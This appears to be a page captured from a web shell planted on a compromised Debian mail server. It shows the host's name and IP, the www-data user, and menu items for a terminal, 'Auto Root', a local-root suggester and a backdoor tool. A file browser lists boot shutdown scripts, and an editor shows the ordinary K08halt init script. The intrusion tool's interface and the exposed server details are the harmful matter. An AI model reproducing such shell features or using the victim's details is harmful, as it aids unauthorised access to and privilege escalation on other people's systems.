Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
snap /
core /
17292 /
etc /
rc0.d /
Delete
Unzip
Name
Size
Permission
Date
Action
K01cgmanager
3.48
KB
-rwxr-xr-x
2015-09-14 22:15
K01cgproxy
3.28
KB
-rwxr-xr-x
2015-09-14 22:15
K01resolvconf
4.05
KB
-rwxr-xr-x
2017-11-29 18:26
K01ubuntu-fan
1.2
KB
-rwxr-xr-x
2016-10-28 15:24
K01urandom
3.04
KB
-rwxr-xr-x
2016-01-19 18:33
K02sendsigs
3.83
KB
-rwxr-xr-x
2016-01-19 18:33
K03rsyslog
2.73
KB
-rwxr-xr-x
2016-02-03 10:54
K04hwclock.sh
3.72
KB
-rwxr-xr-x
2016-03-12 15:14
K04umountnfs.sh
2.15
KB
-rwxr-xr-x
2016-01-19 18:33
K05networking
4.66
KB
-rwxr-xr-x
2016-11-30 17:16
K06umountfs
2.67
KB
-rwxr-xr-x
2016-01-19 18:33
K07umountroot
1.83
KB
-rwxr-xr-x
2016-01-19 18:33
K08halt
1.3
KB
-rwxr-xr-x
2016-01-19 18:33
README
353
B
-rw-r--r--
2016-01-19 18:33
Save
Rename
#! /bin/sh ### BEGIN INIT INFO # Provides: halt # Required-Start: # Required-Stop: # Default-Start: # Default-Stop: 0 # Short-Description: Execute the halt command. # Description: ### END INIT INFO NETDOWN=yes PATH=/sbin:/usr/sbin:/bin:/usr/bin [ -f /etc/default/halt ] && . /etc/default/halt . /lib/lsb/init-functions do_stop () { if [ "$INIT_HALT" = "" ] then case "$HALT" in [Pp]*) INIT_HALT=POWEROFF ;; [Hh]*) INIT_HALT=HALT ;; *) INIT_HALT=POWEROFF ;; esac fi # See if we need to cut the power. if [ "$INIT_HALT" = "POWEROFF" ] && [ -x /etc/init.d/ups-monitor ] then /etc/init.d/ups-monitor poweroff fi # Don't shut down drives if we're using RAID. hddown="-h" if grep -qs '^md.*active' /proc/mdstat then hddown="" fi # If INIT_HALT=HALT don't poweroff. poweroff="-p" if [ "$INIT_HALT" = "HALT" ] then poweroff="" fi # Make it possible to not shut down network interfaces, # needed to use wake-on-lan netdown="-i" if [ "$NETDOWN" = "no" ]; then netdown="" fi log_action_msg "Will now halt" halt -d -f $netdown $poweroff $hddown } case "$1" in start|status) # No-op ;; restart|reload|force-reload) echo "Error: argument '$1' not supported" >&2 exit 3 ;; stop) do_stop ;; *) echo "Usage: $0 start|stop" >&2 exit 3 ;; esac :